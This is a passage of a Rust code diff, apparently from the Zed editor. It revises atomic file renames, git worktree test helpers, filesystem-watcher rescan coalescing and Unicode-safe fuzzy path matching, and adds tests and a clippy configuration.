+ #[cfg(not(any(target_os = "macos", target_os = "linux", target_os = "windows")))] + { + // For platforms which do not have an atomic no-overwrite rename yet. 
+ true + } + }; + + if use_metadata_fallback && smol::fs::metadata(target).await.is_ok() { if options.ignore_if_exists { return Ok(()); } else { @@ -596,12 +673,6 @@ impl Fs for RealFs { } } - if options.create_parents { - if let Some(parent) = target.parent() { - self.create_dir(parent).await?; - } - } - smol::fs::rename(source, target).await?; Ok(()) } @@ -1045,8 +1116,8 @@ impl Fs for RealFs { &self, dotgit_path: &Path, system_git_binary_path: Option<&Path>, - ) -> Option> { - Some(Arc::new(RealGitRepository::new( + ) -> Result> { + Ok(Arc::new(RealGitRepository::new( dotgit_path, self.bundled_git_binary_path.clone(), system_git_binary_path.map(|path| path.to_path_buf()), @@ -1672,6 +1743,10 @@ impl FakeFs { self.state.lock().buffered_events.len() } + pub fn clear_buffered_events(&self) { + self.state.lock().buffered_events.clear(); + } + pub fn flush_events(&self, count: usize) { self.state.lock().flush_events(count); } @@ -1817,11 +1892,15 @@ impl FakeFs { anyhow::bail!("gitfile points to a non-directory") }; let common_dir = if let Some(child) = entries.get("commondir") { - Path::new( - std::str::from_utf8(child.file_content("commondir".as_ref())?) - .context("commondir content")?, - ) - .to_owned() + let raw = std::str::from_utf8(child.file_content("commondir".as_ref())?) + .context("commondir content")? + .trim(); + let raw_path = Path::new(raw); + if raw_path.is_relative() { + normalize_path(&canonical_path.join(raw_path)) + } else { + raw_path.to_owned() + } } else { canonical_path.clone() }; @@ -1885,6 +1964,116 @@ impl FakeFs { .unwrap(); } + pub async fn add_linked_worktree_for_repo( + &self, + dot_git: &Path, + emit_git_event: bool, + worktree: Worktree, + ) { + let ref_name = worktree + .ref_name + .as_ref() + .expect("linked worktree must have a ref_name"); + let branch_name = ref_name + .strip_prefix("refs/heads/") + .unwrap_or(ref_name.as_ref()); + + // Create ref in git state. 
+ self.with_git_state(dot_git, false, |state| { + state + .refs + .insert(ref_name.to_string(), worktree.sha.to_string()); + }) + .unwrap(); + + // Create .git/worktrees// directory with HEAD, commondir, and gitdir. + let worktrees_entry_dir = dot_git.join("worktrees").join(branch_name); + self.create_dir(&worktrees_entry_dir).await.unwrap(); + + self.write_file_internal( + worktrees_entry_dir.join("HEAD"), + format!("ref: {ref_name}").into_bytes(), + false, + ) + .unwrap(); + + self.write_file_internal( + worktrees_entry_dir.join("commondir"), + dot_git.to_string_lossy().into_owned().into_bytes(), + false, + ) + .unwrap(); + + let worktree_dot_git = worktree.path.join(".git"); + self.write_file_internal( + worktrees_entry_dir.join("gitdir"), + worktree_dot_git.to_string_lossy().into_owned().into_bytes(), + false, + ) + .unwrap(); + + // Create the worktree checkout directory with a .git file pointing back. + self.create_dir(&worktree.path).await.unwrap(); + + self.write_file_internal( + &worktree_dot_git, + format!("gitdir: {}", worktrees_entry_dir.display()).into_bytes(), + false, + ) + .unwrap(); + + if emit_git_event { + self.with_git_state(dot_git, true, |_| {}).unwrap(); + } + } + + pub async fn remove_worktree_for_repo( + &self, + dot_git: &Path, + emit_git_event: bool, + ref_name: &str, + ) { + let branch_name = ref_name.strip_prefix("refs/heads/").unwrap_or(ref_name); + let worktrees_entry_dir = dot_git.join("worktrees").join(branch_name); + + // Read gitdir to find the worktree checkout path. + let gitdir_content = self + .load_internal(worktrees_entry_dir.join("gitdir")) + .await + .unwrap(); + let gitdir_str = String::from_utf8(gitdir_content).unwrap(); + let worktree_path = PathBuf::from(gitdir_str.trim()) + .parent() + .map(PathBuf::from) + .unwrap_or_default(); + + // Remove the worktree checkout directory. 
+ self.remove_dir( + &worktree_path, + RemoveOptions { + recursive: true, + ignore_if_not_exists: true, + }, + ) + .await + .unwrap(); + + // Remove the .git/worktrees// directory. + self.remove_dir( + &worktrees_entry_dir, + RemoveOptions { + recursive: true, + ignore_if_not_exists: false, + }, + ) + .await + .unwrap(); + + if emit_git_event { + self.with_git_state(dot_git, true, |_| {}).unwrap(); + } + } + pub fn set_unmerged_paths_for_repo( &self, dot_git: &Path, @@ -2762,9 +2951,7 @@ impl Fs for FakeFs { &self, abs_dot_git: &Path, _system_git_binary: Option<&Path>, - ) -> Option> { - use util::ResultExt as _; - + ) -> Result> { self.with_git_state_and_paths( abs_dot_git, false, @@ -2776,10 +2963,10 @@ impl Fs for FakeFs { repository_dir_path: repository_dir_path.to_owned(), common_dir_path: common_dir_path.to_owned(), checkpoints: Arc::default(), + is_trusted: Arc::default(), }) as _ }, ) - .log_err() } async fn git_init( @@ -2814,10 +3001,6 @@ impl Fs for FakeFs { } } -pub fn normalize_path(path: &Path) -> PathBuf { - util::normalize_path(path) -} - pub async fn copy_recursive<'a>( fs: &'a dyn Fs, source: &'a Path, diff --git a/crates/fs/src/fs_watcher.rs b/crates/fs/src/fs_watcher.rs index efb381c9a5480df598d774dd17e9c49f8ef82f92..02a6b0878110ba1298821ffdf2fb5babecfc81d3 100644 --- a/crates/fs/src/fs_watcher.rs +++ b/crates/fs/src/fs_watcher.rs @@ -3,6 +3,7 @@ use parking_lot::Mutex; use std::{ collections::{BTreeMap, HashMap}, ops::DerefMut, + path::Path, sync::{Arc, OnceLock}, }; use util::{ResultExt, paths::SanitizedPath}; @@ -86,10 +87,12 @@ impl Watcher for FsWatcher { #[cfg(target_os = "linux")] let mode = notify::RecursiveMode::NonRecursive; + let registration_path = path.clone(); let registration_id = global({ - let path = path.clone(); + let watch_path = path.clone(); + let callback_path = path; |g| { - g.add(path, mode, move |event: ¬ify::Event| { + g.add(watch_path, mode, move |event: ¬ify::Event| { log::trace!("watcher received event: {event:?}"); 
let kind = match event.kind { EventKind::Create(_) => Some(PathEventKind::Created), @@ -109,12 +112,27 @@ impl Watcher for FsWatcher { }) .collect::>(); + let is_rescan_event = event.need_rescan(); + if is_rescan_event { + log::warn!( + "filesystem watcher lost sync for {callback_path:?}; scheduling rescan" + ); + // we only keep the first event per path below, this ensures it will be the rescan event + // we'll remove any existing pending events for the same reason once we have the lock below + path_events.retain(|p| &p.path != callback_path.as_ref()); + path_events.push(PathEvent { + path: callback_path.to_path_buf(), + kind: Some(PathEventKind::Rescan), + }); + } + if !path_events.is_empty() { path_events.sort(); let mut pending_paths = pending_paths.lock(); if pending_paths.is_empty() { tx.try_send(()).ok(); } + coalesce_pending_rescans(&mut pending_paths, &mut path_events); util::extend_sorted( &mut *pending_paths, path_events, @@ -126,7 +144,9 @@ impl Watcher for FsWatcher { } })??; - self.registrations.lock().insert(path, registration_id); + self.registrations + .lock() + .insert(registration_path, registration_id); Ok(()) } @@ -141,6 +161,56 @@ impl Watcher for FsWatcher { } } +fn coalesce_pending_rescans(pending_paths: &mut Vec, path_events: &mut Vec) { + if !path_events + .iter() + .any(|event| event.kind == Some(PathEventKind::Rescan)) + { + return; + } + + let mut new_rescan_paths: Vec = path_events + .iter() + .filter(|e| e.kind == Some(PathEventKind::Rescan)) + .map(|e| e.path.clone()) + .collect(); + new_rescan_paths.sort_unstable(); + + let mut deduped_rescans: Vec = Vec::with_capacity(new_rescan_paths.len()); + for path in new_rescan_paths { + if deduped_rescans + .iter() + .any(|ancestor| path != *ancestor && path.starts_with(ancestor)) + { + continue; + } + deduped_rescans.push(path); + } + + deduped_rescans.retain(|new_path| { + !pending_paths + .iter() + .any(|pending| is_covered_rescan(pending.kind, new_path, &pending.path)) + }); + + if 
!deduped_rescans.is_empty() { + pending_paths.retain(|pending| { + !deduped_rescans.iter().any(|rescan_path| { + pending.path == *rescan_path + || is_covered_rescan(pending.kind, &pending.path, rescan_path) + }) + }); + } + + path_events.retain(|event| { + event.kind != Some(PathEventKind::Rescan) || deduped_rescans.contains(&event.path) + }); +} + +fn is_covered_rescan(kind: Option, path: &Path, ancestor: &Path) -> bool { + kind == Some(PathEventKind::Rescan) && path != ancestor && path.starts_with(ancestor) +} + #[derive(Default, Debug, Copy, Clone, PartialEq, Eq, Hash)] pub struct WatcherRegistrationId(u32); @@ -238,6 +308,97 @@ impl GlobalWatcher { static FS_WATCHER_INSTANCE: OnceLock> = OnceLock::new(); +#[cfg(test)] +mod tests { + use super::*; + use std::path::PathBuf; + + fn rescan(path: &str) -> PathEvent { + PathEvent { + path: PathBuf::from(path), + kind: Some(PathEventKind::Rescan), + } + } + + fn changed(path: &str) -> PathEvent { + PathEvent { + path: PathBuf::from(path), + kind: Some(PathEventKind::Changed), + } + } + + struct TestCase { + name: &'static str, + pending_paths: Vec, + path_events: Vec, + expected_pending_paths: Vec, + expected_path_events: Vec, + } + + #[test] + fn test_coalesce_pending_rescans() { + let test_cases = [ + TestCase { + name: "coalesces descendant rescans under pending ancestor", + pending_paths: vec![rescan("/root")], + path_events: vec![rescan("/root/child"), rescan("/root/child/grandchild")], + expected_pending_paths: vec![rescan("/root")], + expected_path_events: vec![], + }, + TestCase { + name: "new ancestor rescan replaces pending descendant rescans", + pending_paths: vec![ + changed("/other"), + rescan("/root/child"), + rescan("/root/child/grandchild"), + ], + path_events: vec![rescan("/root")], + expected_pending_paths: vec![changed("/other")], + expected_path_events: vec![rescan("/root")], + }, + TestCase { + name: "same path rescan replaces pending non-rescan event", + pending_paths: vec![changed("/root")], + 
path_events: vec![rescan("/root")], + expected_pending_paths: vec![], + expected_path_events: vec![rescan("/root")], + }, + TestCase { + name: "unrelated rescans are preserved", + pending_paths: vec![rescan("/root-a")], + path_events: vec![rescan("/root-b")], + expected_pending_paths: vec![rescan("/root-a")], + expected_path_events: vec![rescan("/root-b")], + }, + TestCase { + name: "batch ancestor rescan replaces descendant rescan", + pending_paths: vec![], + path_events: vec![rescan("/root/child"), rescan("/root")], + expected_pending_paths: vec![], + expected_path_events: vec![rescan("/root")], + }, + ]; + + for test_case in test_cases { + let mut pending_paths = test_case.pending_paths; + let mut path_events = test_case.path_events; + + coalesce_pending_rescans(&mut pending_paths, &mut path_events); + + assert_eq!( + pending_paths, test_case.expected_pending_paths, + "pending_paths mismatch for case: {}", + test_case.name + ); + assert_eq!( + path_events, test_case.expected_path_events, + "path_events mismatch for case: {}", + test_case.name + ); + } + } +} + fn handle_event(event: Result) { log::trace!("global handle event: {event:?}"); // Filter out access events, which could lead to a weird bug on Linux after upgrading notify diff --git a/crates/fs/tests/integration/fake_git_repo.rs b/crates/fs/tests/integration/fake_git_repo.rs index 36dfcaf168b4f0190c5c49bf4798fac7bc9bd37b..f4192a22bb42f88f8769ef59f817b2bf2a288fb9 100644 --- a/crates/fs/tests/integration/fake_git_repo.rs +++ b/crates/fs/tests/integration/fake_git_repo.rs @@ -1,9 +1,122 @@ use fs::{FakeFs, Fs}; -use gpui::BackgroundExecutor; +use gpui::{BackgroundExecutor, TestAppContext}; use serde_json::json; -use std::path::Path; +use std::path::{Path, PathBuf}; use util::path; +#[gpui::test] +async fn test_fake_worktree_lifecycle(cx: &mut TestAppContext) { + let fs = FakeFs::new(cx.executor()); + fs.insert_tree("/project", json!({".git": {}, "file.txt": "content"})) + .await; + let repo = fs + 
.open_repo(Path::new("/project/.git"), None) + .expect("should open fake repo"); + + // Initially only the main worktree exists + let worktrees = repo.worktrees().await.unwrap(); + assert_eq!(worktrees.len(), 1); + assert_eq!(worktrees[0].path, PathBuf::from("/project")); + + fs.create_dir("/my-worktrees".as_ref()).await.unwrap(); + let worktrees_dir = Path::new("/my-worktrees"); + + // Create a worktree + let worktree_1_dir = worktrees_dir.join("feature-branch"); + repo.create_worktree( + Some("feature-branch".to_string()), + worktree_1_dir.clone(), + Some("abc123".to_string()), + ) + .await + .unwrap(); + + // List worktrees — should have main + one created + let worktrees = repo.worktrees().await.unwrap(); + assert_eq!(worktrees.len(), 2); + assert_eq!(worktrees[0].path, PathBuf::from("/project")); + assert_eq!(worktrees[1].path, worktree_1_dir); + assert_eq!( + worktrees[1].ref_name, + Some("refs/heads/feature-branch".into()) + ); + assert_eq!(worktrees[1].sha.as_ref(), "abc123"); + + // Directory should exist in FakeFs after create + assert!(fs.is_dir(&worktrees_dir.join("feature-branch")).await); + + // Create a second worktree (without explicit commit) + let worktree_2_dir = worktrees_dir.join("bugfix-branch"); + repo.create_worktree( + Some("bugfix-branch".to_string()), + worktree_2_dir.clone(), + None, + ) + .await + .unwrap(); + + let worktrees = repo.worktrees().await.unwrap(); + assert_eq!(worktrees.len(), 3); + assert!(fs.is_dir(&worktree_2_dir).await); + + // Rename the first worktree + repo.rename_worktree(worktree_1_dir, worktrees_dir.join("renamed-branch")) + .await + .unwrap(); + + let worktrees = repo.worktrees().await.unwrap(); + assert_eq!(worktrees.len(), 3); + assert!( + worktrees + .iter() + .any(|w| w.path == worktrees_dir.join("renamed-branch")), + ); + assert!( + worktrees + .iter() + .all(|w| w.path != worktrees_dir.join("feature-branch")), + ); + + // Directory should be moved in FakeFs after rename + 
assert!(!fs.is_dir(&worktrees_dir.join("feature-branch")).await); + assert!(fs.is_dir(&worktrees_dir.join("renamed-branch")).await); + + // Rename a nonexistent worktree should fail + let result = repo + .rename_worktree(PathBuf::from("/nonexistent"), PathBuf::from("/somewhere")) + .await; + assert!(result.is_err()); + + // Remove a worktree + repo.remove_worktree(worktrees_dir.join("renamed-branch"), false) + .await + .unwrap(); + + let worktrees = repo.worktrees().await.unwrap(); + assert_eq!(worktrees.len(), 2); + assert_eq!(worktrees[0].path, PathBuf::from("/project")); + assert_eq!(worktrees[1].path, worktree_2_dir); + + // Directory should be removed from FakeFs after remove + assert!(!fs.is_dir(&worktrees_dir.join("renamed-branch")).await); + + // Remove a nonexistent worktree should fail + let result = repo + .remove_worktree(PathBuf::from("/nonexistent"), false) + .await; + assert!(result.is_err()); + + // Remove the last worktree + repo.remove_worktree(worktree_2_dir.clone(), false) + .await + .unwrap(); + + let worktrees = repo.worktrees().await.unwrap(); + assert_eq!(worktrees.len(), 1); + assert_eq!(worktrees[0].path, PathBuf::from("/project")); + assert!(!fs.is_dir(&worktree_2_dir).await); +} + #[gpui::test] async fn test_checkpoints(executor: BackgroundExecutor) { let fs = FakeFs::new(executor); @@ -46,7 +159,10 @@ async fn test_checkpoints(executor: BackgroundExecutor) { .unwrap() ); - repository.restore_checkpoint(checkpoint_1).await.unwrap(); + repository + .restore_checkpoint(checkpoint_1.clone()) + .await + .unwrap(); assert_eq!( fs.files_with_contents(Path::new("")), [ @@ -55,4 +171,22 @@ async fn test_checkpoints(executor: BackgroundExecutor) { (Path::new(path!("/foo/b")).into(), b"ipsum".into()) ] ); + + // diff_checkpoints: identical checkpoints produce empty diff + let diff = repository + .diff_checkpoints(checkpoint_2.clone(), checkpoint_3.clone()) + .await + .unwrap(); + assert!( + diff.is_empty(), + "identical checkpoints should produce 
empty diff" + ); + + // diff_checkpoints: different checkpoints produce non-empty diff + let diff = repository + .diff_checkpoints(checkpoint_1.clone(), checkpoint_2.clone()) + .await + .unwrap(); + assert!(diff.contains("b"), "diff should mention changed file 'b'"); + assert!(diff.contains("c"), "diff should mention added file 'c'"); } diff --git a/crates/fs/tests/integration/fs.rs b/crates/fs/tests/integration/fs.rs index dd5e694e23c99716a81b27afd487e3a6ea648209..34c1430a995402bd1e28817785c3b4ff707d4abd 100644 --- a/crates/fs/tests/integration/fs.rs +++ b/crates/fs/tests/integration/fs.rs @@ -1,10 +1,14 @@ use std::{ + collections::BTreeSet, io::Write, path::{Path, PathBuf}, + time::Duration, }; +use futures::{FutureExt, StreamExt}; + use fs::*; -use gpui::BackgroundExecutor; +use gpui::{BackgroundExecutor, TestAppContext}; use serde_json::json; use tempfile::TempDir; use util::path; @@ -523,6 +527,65 @@ async fn test_rename(executor: BackgroundExecutor) { ); } +#[gpui::test] +#[cfg(any(target_os = "macos", target_os = "linux", target_os = "windows"))] +async fn test_realfs_parallel_rename_without_overwrite_preserves_losing_source( + executor: BackgroundExecutor, +) { + let temp_dir = TempDir::new().unwrap(); + let root = temp_dir.path(); + let source_a = root.join("dir_a/shared.txt"); + let source_b = root.join("dir_b/shared.txt"); + let target = root.join("shared.txt"); + + std::fs::create_dir_all(source_a.parent().unwrap()).unwrap(); + std::fs::create_dir_all(source_b.parent().unwrap()).unwrap(); + std::fs::write(&source_a, "from a").unwrap(); + std::fs::write(&source_b, "from b").unwrap(); + + let fs = RealFs::new(None, executor); + let (first_result, second_result) = futures::future::join( + fs.rename(&source_a, &target, RenameOptions::default()), + fs.rename(&source_b, &target, RenameOptions::default()), + ) + .await; + + assert_ne!(first_result.is_ok(), second_result.is_ok()); + assert!(target.exists()); + assert_eq!(source_a.exists() as u8 + 
source_b.exists() as u8, 1); +} + +#[gpui::test] +#[cfg(any(target_os = "macos", target_os = "linux", target_os = "windows"))] +async fn test_realfs_rename_ignore_if_exists_leaves_source_and_target_unchanged( + executor: BackgroundExecutor, +) { + let temp_dir = TempDir::new().unwrap(); + let root = temp_dir.path(); + let source = root.join("source.txt"); + let target = root.join("target.txt"); + + std::fs::write(&source, "from source").unwrap(); + std::fs::write(&target, "from target").unwrap(); + + let fs = RealFs::new(None, executor); + let result = fs + .rename( + &source, + &target, + RenameOptions { + ignore_if_exists: true, + ..Default::default() + }, + ) + .await; + + assert!(result.is_ok()); + + assert_eq!(std::fs::read_to_string(&source).unwrap(), "from source"); + assert_eq!(std::fs::read_to_string(&target).unwrap(), "from target"); +} + #[gpui::test] #[cfg(unix)] async fn test_realfs_broken_symlink_metadata(executor: BackgroundExecutor) { @@ -562,3 +625,90 @@ async fn test_realfs_symlink_loop_metadata(executor: BackgroundExecutor) { assert!(!metadata.is_executable); // don't care about len or mtime on symlinks? 
} + +#[gpui::test] +#[ignore = "stress test; run explicitly when needed"] +async fn test_realfs_watch_stress_reports_missed_paths( + executor: BackgroundExecutor, + cx: &mut TestAppContext, +) { + const FILE_COUNT: usize = 32000; + cx.executor().allow_parking(); + + let fs = RealFs::new(None, executor.clone()); + let temp_dir = TempDir::new().expect("create temp dir"); + let root = temp_dir.path(); + + let mut file_paths = Vec::with_capacity(FILE_COUNT); + let mut expected_paths = BTreeSet::new(); + + for index in 0..FILE_COUNT { + let dir_path = root.join(format!("dir-{index:04}")); + let file_path = dir_path.join("file.txt"); + fs.create_dir(&dir_path).await.expect("create watched dir"); + fs.write(&file_path, b"before") + .await + .expect("create initial file"); + expected_paths.insert(file_path.clone()); + file_paths.push(file_path); + } + + let (mut events, watcher) = fs.watch(root, Duration::from_millis(10)).await; + let _watcher = watcher; + + for file_path in &expected_paths { + _watcher + .add(file_path.parent().expect("file has parent")) + .expect("add explicit directory watch"); + } + + for (index, file_path) in file_paths.iter().enumerate() { + let content = format!("after-{index}"); + fs.write(file_path, content.as_bytes()) + .await + .expect("modify watched file"); + } + + let mut changed_paths = BTreeSet::new(); + let mut rescan_count: u32 = 0; + let timeout = executor.timer(Duration::from_secs(10)).fuse(); + + futures::pin_mut!(timeout); + + let mut ticks = 0; + while ticks < 1000 { + if let Some(batch) = events.next().fuse().now_or_never().flatten() { + for event in batch { + if event.kind == Some(PathEventKind::Rescan) { + rescan_count += 1; + } + if expected_paths.contains(&event.path) { + changed_paths.insert(event.path); + } + } + if changed_paths.len() == expected_paths.len() { + break; + } + ticks = 0; + } else { + ticks += 1; + executor.timer(Duration::from_millis(10)).await; + } + } + + let missed_paths: BTreeSet<_> = 
expected_paths.difference(&changed_paths).cloned().collect(); + + eprintln!( + "realfs watch stress: expected={}, observed={}, missed={}, rescan={}", + expected_paths.len(), + changed_paths.len(), + missed_paths.len(), + rescan_count + ); + + assert!( + missed_paths.is_empty() || rescan_count > 0, + "missed {} paths without rescan being reported", + missed_paths.len() + ); +} diff --git a/crates/fuzzy/src/char_bag.rs b/crates/fuzzy/src/char_bag.rs index 13b00816ed0141117fb6d5ac9265e4b82c7aa57d..1821a63793337862d9d6ad01a6a42072588d7be5 100644 --- a/crates/fuzzy/src/char_bag.rs +++ b/crates/fuzzy/src/char_bag.rs @@ -1,5 +1,9 @@ use std::iter::FromIterator; +pub fn simple_lowercase(c: char) -> char { + c.to_lowercase().next().unwrap_or(c) +} + #[derive(Copy, Clone, Debug, Default, PartialEq, Eq, Hash)] pub struct CharBag(u64); @@ -9,7 +13,7 @@ impl CharBag { } fn insert(&mut self, c: char) { - let c = c.to_ascii_lowercase(); + let c = simple_lowercase(c); if c.is_ascii_lowercase() { let mut count = self.0; let idx = c as u8 - b'a'; diff --git a/crates/fuzzy/src/matcher.rs b/crates/fuzzy/src/matcher.rs index 782c9caca832d81fb6e4bce8f49b4f310664b292..102708d2fad6b560b1a606c34246033587affdda 100644 --- a/crates/fuzzy/src/matcher.rs +++ b/crates/fuzzy/src/matcher.rs @@ -1,10 +1,9 @@ use std::{ borrow::Borrow, - collections::BTreeMap, sync::atomic::{self, AtomicBool}, }; -use crate::CharBag; +use crate::{CharBag, char_bag::simple_lowercase}; const BASE_DISTANCE_PENALTY: f64 = 0.6; const ADDITIONAL_DISTANCE_PENALTY: f64 = 0.05; @@ -69,7 +68,6 @@ impl<'a> Matcher<'a> { { let mut candidate_chars = Vec::new(); let mut lowercase_candidate_chars = Vec::new(); - let mut extra_lowercase_chars = BTreeMap::new(); for candidate in candidates { if !candidate.borrow().has_chars(self.query_char_bag) { @@ -82,14 +80,9 @@ impl<'a> Matcher<'a> { candidate_chars.clear(); lowercase_candidate_chars.clear(); - extra_lowercase_chars.clear(); - for (i, c) in 
candidate.borrow().candidate_chars().enumerate() { + for c in candidate.borrow().candidate_chars() { candidate_chars.push(c); - let mut char_lowercased = c.to_lowercase().collect::>(); - if char_lowercased.len() > 1 { - extra_lowercase_chars.insert(i, char_lowercased.len() - 1); - } - lowercase_candidate_chars.append(&mut char_lowercased); + lowercase_candidate_chars.push(simple_lowercase(c)); } if !self.find_last_positions(lowercase_prefix, &lowercase_candidate_chars) { @@ -108,7 +101,6 @@ impl<'a> Matcher<'a> { &lowercase_candidate_chars, prefix, lowercase_prefix, - &extra_lowercase_chars, ); if score > 0.0 { @@ -146,7 +138,6 @@ impl<'a> Matcher<'a> { path_lowercased: &[char], prefix: &[char], lowercase_prefix: &[char], - extra_lowercase_chars: &BTreeMap, ) -> f64 { let score = self.recursive_score_match( path, @@ -156,7 +147,6 @@ impl<'a> Matcher<'a> { 0, 0, self.query.len() as f64, - extra_lowercase_chars, ) * self.query.len() as f64; if score <= 0.0 { @@ -201,7 +191,6 @@ impl<'a> Matcher<'a> { query_idx: usize, path_idx: usize, cur_score: f64, - extra_lowercase_chars: &BTreeMap, ) -> f64 { if query_idx == self.query.len() { return 1.0; @@ -228,13 +217,6 @@ impl<'a> Matcher<'a> { let mut last_slash = 0; for j in path_idx..=safe_limit { - let extra_lowercase_chars_count = extra_lowercase_chars - .iter() - .take_while(|&(&i, _)| i < j) - .map(|(_, increment)| increment) - .sum::(); - let j_regular = j - extra_lowercase_chars_count; - let path_char = if j < prefix.len() { lowercase_prefix[j] } else { @@ -247,20 +229,20 @@ impl<'a> Matcher<'a> { let is_path_sep = path_char == '/'; if query_idx == 0 && is_path_sep { - last_slash = j_regular; + last_slash = j; } let need_to_score = query_char == path_char || (is_path_sep && query_char == '_'); if need_to_score { - let curr = match prefix.get(j_regular) { + let curr = match prefix.get(j) { Some(&curr) => curr, - None => path[j_regular - prefix.len()], + None => path[j - prefix.len()], }; let mut char_score = 1.0; if j 
> path_idx { - let last = match prefix.get(j_regular - 1) { + let last = match prefix.get(j - 1) { Some(&last) => last, - None => path[j_regular - 1 - prefix.len()], + None => path[j - 1 - prefix.len()], }; if last == '/' { @@ -316,12 +298,11 @@ impl<'a> Matcher<'a> { query_idx + 1, j + 1, next_score, - extra_lowercase_chars, ) * multiplier; if new_score > score { score = new_score; - best_position = j_regular; + best_position = j; // Optimization: can't score better than 1. if new_score == 1.0 { break; @@ -469,12 +450,12 @@ mod tests { assert_eq!( match_single_path_query("İo/oluş", false, &mixed_unicode_paths), - vec![("İolu/oluş", vec![0, 2, 4, 6, 8, 10, 12])] + vec![("İolu/oluş", vec![0, 2, 5, 6, 7, 8, 9])] ); assert_eq!( match_single_path_query("İst/code", false, &mixed_unicode_paths), - vec![("İstanbul/code", vec![0, 2, 4, 6, 8, 10, 12, 14])] + vec![("İstanbul/code", vec![0, 2, 3, 9, 10, 11, 12, 13])] ); assert_eq!( @@ -536,12 +517,60 @@ mod tests { ); } + #[test] + fn test_positions_are_valid_char_boundaries_with_expanding_lowercase() { + // İ (U+0130) lowercases to "i\u{307}" (2 chars) under full case folding. + // With simple case mapping (used by this matcher), İ → 'i' (1 char), + // so positions remain valid byte boundaries. + let paths = vec!["İstanbul/code.rs", "aİbİc/dİeİf.txt", "src/İmport/İndex.ts"]; + + for query in &["code", "İst", "dİe", "İndex", "İmport", "abcdef"] { + let results = match_single_path_query(query, false, &paths); + for (path, positions) in &results { + for &pos in positions { + assert!( + path.is_char_boundary(pos), + "Position {pos} is not a valid char boundary in path {path:?} \ + (query: {query:?}, all positions: {positions:?})" + ); + } + } + } + } + + #[test] + fn test_positions_valid_with_various_multibyte_chars() { + // German ß uppercases to SS but lowercases to itself — no expansion. + // Armenian ligatures and other characters that could expand under full + // case folding should still produce valid byte boundaries. 
+ let paths = vec![ + "straße/config.rs", + "Straße/München/file.txt", + "file/path.rs", // fi (U+FB01, fi ligature) + "ffoo/bar.txt", // ff (U+FB00, ff ligature) + "aÇbŞc/dÖeÜf.txt", // Turkish chars that don't expand + ]; + + for query in &["config", "Mün", "file", "bar", "abcdef", "straße", "ÇŞ"] { + let results = match_single_path_query(query, false, &paths); + for (path, positions) in &results { + for &pos in positions { + assert!( + path.is_char_boundary(pos), + "Position {pos} is not a valid char boundary in path {path:?} \ + (query: {query:?}, all positions: {positions:?})" + ); + } + } + } + } + fn match_single_path_query<'a>( query: &str, smart_case: bool, paths: &[&'a str], ) -> Vec<(&'a str, Vec)> { - let lowercase_query = query.to_lowercase().chars().collect::>(); + let lowercase_query = query.chars().map(simple_lowercase).collect::>(); let query = query.chars().collect::>(); let query_chars = CharBag::from(&lowercase_query[..]); @@ -551,7 +580,7 @@ mod tests { .collect::>(); let mut path_entries = Vec::new(); for (i, path) in paths.iter().enumerate() { - let lowercase_path = path.to_lowercase().chars().collect::>(); + let lowercase_path: Vec = path.chars().map(simple_lowercase).collect(); let char_bag = CharBag::from(lowercase_path.as_slice()); path_entries.push(PathMatchCandidate { is_dir: false, diff --git a/crates/fuzzy/src/paths.rs b/crates/fuzzy/src/paths.rs index cce0e082840c4cd05d6e2b21eac0073d3eb7700f..2f92f05b96a3be2da7053365d8a7c53722db6ab8 100644 --- a/crates/fuzzy/src/paths.rs +++ b/crates/fuzzy/src/paths.rs @@ -10,6 +10,7 @@ use util::{paths::PathStyle, rel_path::RelPath}; use crate::{ CharBag, + char_bag::simple_lowercase, matcher::{MatchCandidate, Matcher}, }; @@ -94,7 +95,7 @@ pub fn match_fixed_path_set( max_results: usize, path_style: PathStyle, ) -> Vec { - let lowercase_query = query.to_lowercase().chars().collect::>(); + let lowercase_query = query.chars().map(simple_lowercase).collect::>(); let query = query.chars().collect::>(); 
let query_char_bag = CharBag::from(&lowercase_query[..]); @@ -110,7 +111,7 @@ pub fn match_fixed_path_set( path_prefix_chars.extend(path_style.primary_separator().chars()); let lowercase_pfx = path_prefix_chars .iter() - .map(|c| c.to_ascii_lowercase()) + .map(|c| simple_lowercase(*c)) .collect::>(); (worktree_root_name, path_prefix_chars, lowercase_pfx) @@ -171,7 +172,7 @@ pub async fn match_path_sets<'a, Set: PathMatchCandidateSet<'a>>( let lowercase_query = query .iter() - .map(|query| query.to_ascii_lowercase()) + .map(|query| simple_lowercase(*query)) .collect::>(); let query = &query; @@ -217,7 +218,7 @@ pub async fn match_path_sets<'a, Set: PathMatchCandidateSet<'a>>( } let lowercase_prefix = prefix .iter() - .map(|c| c.to_ascii_lowercase()) + .map(|c| simple_lowercase(*c)) .collect::>(); matcher.match_candidates( &prefix, diff --git a/crates/fuzzy/src/strings.rs b/crates/fuzzy/src/strings.rs index 54539840cfb0ca251428d9f78d5d134f16afdf4c..fb191bd9dcadd81a5a9890032ef8b185cdf7342e 100644 --- a/crates/fuzzy/src/strings.rs +++ b/crates/fuzzy/src/strings.rs @@ -1,5 +1,6 @@ use crate::{ CharBag, + char_bag::simple_lowercase, matcher::{MatchCandidate, Matcher}, }; use gpui::BackgroundExecutor; @@ -141,7 +142,7 @@ where .collect(); } - let lowercase_query = query.to_lowercase().chars().collect::>(); + let lowercase_query = query.chars().map(simple_lowercase).collect::>(); let query = query.chars().collect::>(); let lowercase_query = &lowercase_query; diff --git a/crates/git/Cargo.toml b/crates/git/Cargo.toml index 4d96312e274b3934e0d1ae8aa1f16f235d30a59f..23a937bf1fa17481eb5e130b3e083274dd3f1d16 100644 --- a/crates/git/Cargo.toml +++ b/crates/git/Cargo.toml @@ -48,7 +48,6 @@ ztracing.workspace = true pretty_assertions.workspace = true serde_json.workspace = true text = { workspace = true, features = ["test-support"] } -unindent.workspace = true gpui = { workspace = true, features = ["test-support"] } tempfile.workspace = true rand.workspace = true diff --git 
a/crates/git/clippy.toml b/crates/git/clippy.toml new file mode 100644 index 0000000000000000000000000000000000000000..fb3926840493fd5981c1861e7cea96bd54b9647f --- /dev/null +++ b/crates/git/clippy.toml @@ -0,0 +1,28 @@ +allow-private-module-inception = true +avoid-breaking-exported-api = false +ignore-interior-mutability = [ + # Suppresses clippy::mutable_key_type, which is a false positive as the Eq + # and Hash impls do not use fields with interior mutability. + "agent_ui::context::AgentContextKey" +] +disallowed-methods = [ + { path = "std::process::Command::spawn", reason = "Spawning `std::process::Command` can block the current thread for an unknown duration", replacement = "smol::process::Command::spawn" }, + { path = "std::process::Command::output", reason = "Spawning `std::process::Command` can block the current thread for an unknown duration", replacement = "smol::process::Command::output" }, + { path = "std::process::Command::status", reason = "Spawning `std::process::Command` can block the current thread for an unknown duration", replacement = "smol::process::Command::status" }, 